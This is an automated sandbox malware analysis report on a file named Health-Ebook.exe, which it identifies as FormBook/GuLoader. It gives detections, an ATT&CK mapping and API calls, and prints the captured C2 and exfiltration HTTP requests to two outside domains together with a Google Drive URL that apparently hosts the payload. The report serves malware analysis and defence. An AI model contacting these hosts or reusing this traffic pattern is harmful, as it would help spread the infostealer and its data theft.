Loading ...

Play interactive tourEdit tour

Analysis Report Health-Ebook.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:218399
Start date:27.03.2020
Start time:01:03:20
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 59s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Health-Ebook.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.rans.troj.spyw.evad.winEXE@15/8@9/3
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 18.3% (good quality ratio 15.7%)
  • Quality average: 69.5%
  • Quality standard deviation: 34.2%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 216.58.215.238, 2.18.68.82, 172.217.168.46
  • Excluded domains from analysis (whitelisted): docs.google.com, fs.microsoft.com, drive.google.com, e1723.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook GuLoader
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through Module Load1Registry Run Keys / Startup Folder1Process Injection512Disabling Security Tools1Credential Dumping1Security Software Discovery221Remote File Copy3Data from Local System1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaGraphical User Interface1Port MonitorsAccessibility FeaturesSoftware Packing1Input Capture1File and Directory Discovery2Remote ServicesEmail Collection1Exfiltration Over Other Network MediumStandard Cryptographic Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesWindows Management InstrumentationAccessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery13Windows Remote ManagementInput Capture1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information3Credentials in FilesVirtualization/Sandbox Evasion12Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol15SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion12Brute ForceRemote System Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection512Two-Factor Authentication InterceptionNetwork SniffingPass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Health-Ebook.exeVirustotal: Detection: 63%Perma Link
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 0.2.Health-Ebook.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 2.0.Health-Ebook.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 0.0.Health-Ebook.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 15.0.h8tczuli.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.2.h8tczuli.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen
Source: 14.0.h8tczuli.exe.400000.0.unpackAvira: Label: TR/Dropper.VB.Gen

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 4x nop then pop edi2_2_000ABB6F
Source: C:\Program Files (x86)\Bjrnh\h8tczuli.exeCode function: 4x nop then pop edi15_2_0006BB6F

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20 HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=3PkPLEV8daGFL4/3pxhg1tKv6aVypEBkpsp65f+Yzy4XBcektFNWUD7dAcSGsTOSbbgw HTTP/1.1Host: www.kbasherphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: AUTOMATTIC-AutomatticIncUS AUTOMATTIC-AutomatticIncUS
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.kbasherphotography.comConnection: closeContent-Length: 143114Cache-Control: no-cacheOrigin: http://www.kbasherphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kbasherphotography.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 63 74 3d 28 74 6f 31 56 6b 77 55 4a 74 48 32 66 61 53 4d 68 55 6f 4a 71 61 54 4d 71 50 68 6d 38 6d 52 41 77 37 6f 67 38 64 47 5f 28 52 6f 43 47 5f 43 56 72 32 6b 47 5a 48 43 4e 53 61 53 48 31 79 32 6e 4e 72 34 36 35 32 6b 4b 61 4f 64 4b 47 39 49 68 30 68 62 67 37 45 56 5a 65 52 32 74 56 47 43 6e 76 62 6c 4a 4d 7a 31 62 32 68 70 66 41 4b 67 7a 4e 49 75 31 72 6e 78 45 43 79 72 39 35 49 55 2d 69 61 53 69 47 36 53 71 55 50 50 58 45 69 4b 6d 30 58 62 50 48 69 42 6f 36 45 55 4f 7a 33 36 53 54 2d 38 48 7a 6b 62 61 53 5a 37 64 54 4f 4f 48 56 41 34 53 4f 43 33 4f 37 4f 6a 4f 6b 75 47 4b 73 66 41 6c 41 78 6d 38 70 32 42 62 78 4d 77 79 73 67 63 56 31 34 54 4f 61 69 41 53 71 42 59 5a 6f 4f 75 62 73 45 41 35 4e 54 79 42 46 45 66 4f 72 45 33 31 7a 75 77 71 65 61 4e 57 6e 42 33 59 37 69 35 74 32 57 4b 4d 32 68 35 48 53 56 61 30 6a 39 34 37 54 7a 6b 4c 36 34 4d 63 39 50 49 2d 38 53 47 66 6d 47 63 35 56 36 75 72 39 5f 71 66 37 67 73 69 79 4b 73 67 46 4e 72 6b 37 4d 70 51 35 4e 78 56 6f 38 7a 48 41 6b 65 72 6b 53 50 43 33 71 43 49 35 56 6b 45 39 76 35 52 49 31 41 70 68 53 70 38 33 5f 6e 54 48 4f 73 2d 50 49 49 51 65 6d 75 65 37 30 6e 62 75 35 66 4f 76 2d 78 36 39 47 74 35 6b 43 6a 45 46 76 4a 63 43 38 6b 31 73 68 55 6b 50 46 37 38 45 4a 33 41 43 70 53 77 56 4d 64 56 59 6d 63 59 32 32 69 75 6f 44 74 36 33 74 58 48 6c 4f 67 77 4a 69 73 74 75 73 78 6b 37 64 68 78 62 44 6b 32 55 66 4d 72 4d 42 6e 35 59 65 4f 79 4e 46 69 58 6e 43 62 71 37 6a 69 54 38 44 48 77 58 4b 47 55 6a 76 57 53 38 53 55 6f 78 34 61 46 57 74 56 73 38 4c 64 72 47 35 4a 59 74 69 41 71 59 36 64 36 31 5a 39 38 76 55 67 6d 6a 38 4e 70 71 68 53 69 65 36 4b 6d 42 2d 4e 48 41 50 50 61 50 4e 6b 77 44 59 47 65 72 30 56 53 65 4f 4c 51 33 75 78 39 54 41 51 2d 4a 43 52 57 46 55 34 59 73 6c 50 74 71 6f 58 4e 69 37 73 43 36 53 34 72 42 48 46 58 6d 31 72 37 6f 65 48 66 43 78 48 4a 4a 5a 44 68 36 39 4e 2d 74 56 62 30 35 2d 4e 5a 4b 44 59 4c 65 49 4b 49 74 46 36 6f 47 59 69 66 37 56 57 65 42 63 6e 57 4d 6e 57 45 76 4a 69 42 33 45 72 44 4e 52 39 50 76 49 33 62 4d 2d 6f 59 41 39 66 75 42 36 43 34 61 55 74 51 68 36 32 35 4a 65 76 53 41 6f 53 6a 32 2d 4e 55 43 41 6c 58 58 4a 61 38 46 6d 57 57 4c 54 43 6d 73 61 53 75 48 6d 46 78 54 6b 46 79 4e 76 57 43 59 38 48 62 55 53 77 32 5a 4c 67 57 69 38 56 70 70 4e 59 32 4f 74 7e 49 69 2d 61 54 65 30 69 52 55 70 37 43 5a 77 4d 45 5a 69 59 30 4c 46 75 71 52 6d 77 47 33 76 45 64 4d 53 62 4a 79 71 6e 78 6f 53 7a 62 54 7a 45 32 4f 35 56 64 77 31 74 35 41 4b 63 52 75 50 7a 35 79 45 39 6a 4a 2d 71 49 71 54 32 41 42 4a 4e 59 44 52 67 6d 44 79 51 46 44 58 50 6
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=vO9Vm2RARflm5p1PFXqn6eBrWTFFnunBf6X3DMkFEdmGbjkCk/pABuPtOpuxvLvCis20 HTTP/1.1Host: www.michalshahar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /w0k/?r65hj=BN90bfcptvP4SJ&3fct=3PkPLEV8daGFL4/3pxhg1tKv6aVypEBkpsp65f+Yzy4XBcektFNWUD7dAcSGsTOSbbgw HTTP/1.1Host: www.kbasherphotography.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc-0s-5o-docs.googleusercontent.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /w0k/ HTTP/1.1Host: www.kbasherphotography.comConnection: closeContent-Length: 143114Cache-Control: no-cacheOrigin: http://www.kbasherphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kbasherphotography.com/w0k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 63 74 3d 28 74 6f 31 56 6b 77 55 4a 74 48 32 66 61 53 4d 68 55 6f 4a 71 61 54 4d 71 50 68 6d 38 6d 52 41 77 37 6f 67 38 64 47 5f 28 52 6f 43 47 5f 43 56 72 32 6b 47 5a 48 43 4e 53 61 53 48 31 79 32 6e 4e 72 34 36 35 32 6b 4b 61 4f 64 4b 47 39 49 68 30 68 62 67 37 45 56 5a 65 52 32 74 56 47 43 6e 76 62 6c 4a 4d 7a 31 62 32 68 70 66 41 4b 67 7a 4e 49 75 31 72 6e 78 45 43 79 72 39 35 49 55 2d 69 61 53 69 47 36 53 71 55 50 50 58 45 69 4b 6d 30 58 62 50 48 69 42 6f 36 45 55 4f 7a 33 36 53 54 2d 38 48 7a 6b 62 61 53 5a 37 64 54 4f 4f 48 56 41 34 53 4f 43 33 4f 37 4f 6a 4f 6b 75 47 4b 73 66 41 6c 41 78 6d 38 70 32 42 62 78 4d 77 79 73 67 63 56 31 34 54 4f 61 69 41 53 71 42 59 5a 6f 4f 75 62 73 45 41 35 4e 54 79 42 46 45 66 4f 72 45 33 31 7a 75 77 71 65 61 4e 57 6e 42 33 59 37 69 35 74 32 57 4b 4d 32 68 35 48 53 56 61 30 6a 39 34 37 54 7a 6b 4c 36 34 4d 63 39 50 49 2d 38 53 47 66 6d 47 63 35 56 36 75 72 39 5f 71 66 37 67 73 69 79 4b 73 67 46 4e 72 6b 37 4d 70 51 35 4e 78 56 6f 38 7a 48 41 6b 65 72 6b 53 50 43 33 71 43 49 35 56 6b 45 39 76 35 52 49 31 41 70 68 53 70 38 33 5f 6e 54 48 4f 73 2d 50 49 49 51 65 6d 75 65 37 30 6e 62 75 35 66 4f 76 2d 78 36 39 47 74 35 6b 43 6a 45 46 76 4a 63 43 38 6b 31 73 68 55 6b 50 46 37 38 45 4a 33 41 43 70 53 77 56 4d 64 56 59 6d 63 59 32 32 69 75 6f 44 74 36 33 74 58 48 6c 4f 67 77 4a 69 73 74 75 73 78 6b 37 64 68 78 62 44 6b 32 55 66 4d 72 4d 42 6e 35 59 65 4f 79 4e 46 69 58 6e 43 62 71 37 6a 69 54 38 44 48 77 58 4b 47 55 6a 76 57 53 38 53 55 6f 78 34 61 46 57 74 56 73 38 4c 64 72 47 35 4a 59 74 69 41 71 59 36 64 36 31 5a 39 38 76 55 67 6d 6a 38 4e 70 71 68 53 69 65 36 4b 6d 42 2d 4e 48 41 50 50 61 50 4e 6b 77 44 59 47 65 72 30 56 53 65 4f 4c 51 33 75 78 39 54 41 51 2d 4a 43 52 57 46 55 34 59 73 6c 50 74 71 6f 58 4e 69 37 73 43 36 53 34 72 42 48 46 58 6d 31 72 37 6f 65 48 66 43 78 48 4a 4a 5a 44 68 36 39 4e 2d 74 56 62 30 35 2d 4e 5a 4b 44 59 4c 65 49 4b 49 74 46 36 6f 47 59 69 66 37 56 57 65 42 63 6e 57 4d 6e 57 45 76 4a 69 42 33 45 72 44 4e 52 39 50 76 49 33 62 4d 2d 6f 59 41 39 66 75 42 36 43 34 61 55 74 51 68 36 32 35 4a 65 76 53 41 6f 53 6a 32 2d 4e 55 43 41 6c 58 58 4a 61 38 46 6d 57 57 4c 54 43 6d 73 61 53 75 48 6d 46 78 54 6b 46 79 4e 76 57 43 59 38 48 62 55 53 77 32 5a 4c 67 57 69 38 56 70 70 4e 59 32 4f 74 7e 49 69 2d 61 54 65 30 69 52 55 70 37 43 5a 77 4d 45 5a 69 59 30 4c 46 75 71 52 6d 77 47 33 76 45 64 4d 53 62 4a 79 71 6e 78 6f 53 7a 62 54 7a 45 32 4f 35 56 64 77 31 74 35 41 4b 63 52 75 50 7a 35 79 45 39 6a 4a 2d 71 49 71 54 32 41 42 4a 4e 59 44 52 67 6d 44 79 51 46 44 58 50 6
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 27 Mar 2020 00:04:44 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: Health-Ebook.exe, 00000000.00000002.768571931.0000000002040000.00000040.00000001.sdmp, Health-Ebook.exe, 00000002.00000002.820734895.00000000004F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000E.00000002.1066471434.00000000006F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1088990486.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: http://myurl/myfile.bin
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.795704817.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.798117614.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: Health-Ebook.exe, 00000000.00000002.768571931.0000000002040000.00000040.00000001.sdmp, Health-Ebook.exe, 00000002.00000002.820734895.00000000004F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000E.00000002.1066471434.00000000006F0000.00000040.00000001.sdmp, h8tczuli.exe, 0000000F.00000002.1088990486.00000000004F0000.00000040.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gFbYNKbyWP39HA-ViQO1paj7YMBxdq0p
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: h8tczuli.exe, 0000000E.00000002.1066525911.00000000007D0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.824223274.000000001F2B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1092674638.000000001F170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.820345826.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1088842031.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Potential malicious icon foundShow sources
Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02044A7B NtResumeThread,0_2_02044A7B
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204008A NtSetInformationThread,TerminateProcess,0_2_0204008A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_0204472A NtProtectVirtualMemory,0_2_0204472A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_020417C8 NtWriteVirtualMemory,0_2_020417C8
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 0_2_02044E98 NtResumeThread,0_2_02044E98
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A750 NtCreateFile,LdrInitializeThunk,2_2_1F54A750
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A700 NtProtectVirtualMemory,LdrInitializeThunk,2_2_1F54A700
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A720 NtResumeThread,LdrInitializeThunk,2_2_1F54A720
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A610 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_1F54A610
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A6A0 NtCreateSection,LdrInitializeThunk,2_2_1F54A6A0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A540 NtDelayExecution,LdrInitializeThunk,2_2_1F54A540
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A560 NtQuerySystemInformation,LdrInitializeThunk,2_2_1F54A560
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A5F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_1F54A5F0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A410 NtQueryInformationToken,LdrInitializeThunk,2_2_1F54A410
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A480 NtMapViewOfSection,LdrInitializeThunk,2_2_1F54A480
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A4A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_1F54A4A0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A360 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_1F54A360
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A3E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_1F54A3E0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A240 NtReadFile,LdrInitializeThunk,2_2_1F54A240
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A2D0 NtClose,LdrInitializeThunk,2_2_1F54A2D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A710 NtQuerySection,2_2_1F54A710
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A780 NtOpenDirectoryObject,2_2_1F54A780
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A650 NtQueueApcThread,2_2_1F54A650
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A6D0 NtCreateProcessEx,2_2_1F54A6D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54BD40 NtSuspendThread,2_2_1F54BD40
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A520 NtEnumerateKey,2_2_1F54A520
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A5A0 NtWriteVirtualMemory,2_2_1F54A5A0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A470 NtSetInformationFile,2_2_1F54A470
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54B470 NtOpenThread,2_2_1F54B470
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A460 NtOpenProcess,2_2_1F54A460
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54B410 NtOpenProcessToken,2_2_1F54B410
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A430 NtQueryVirtualMemory,2_2_1F54A430
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54ACE0 NtCreateMutant,2_2_1F54ACE0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A350 NtQueryValueKey,2_2_1F54A350
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A370 NtQueryInformationProcess,2_2_1F54A370
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A310 NtEnumerateValueKey,2_2_1F54A310
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A3D0 NtCreateKey,2_2_1F54A3D0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A260 NtWriteFile,2_2_1F54A260
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54BA30 NtSetContextThread,2_2_1F54BA30
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A220 NtWaitForSingleObject,2_2_1F54A220
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A2F0 NtQueryInformationFile,2_2_1F54A2F0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54A800 NtSetValueKey,2_2_1F54A800
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_1F54B0B0 NtGetContextThread,2_2_1F54B0B0
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F008A NtSetInformationThread,2_2_004F008A
Source: C:\Users\user\Desktop\Health-Ebook.exeCode function: 2_2_004F4A7B NtSetInformationThread,2_2_004F4A7B
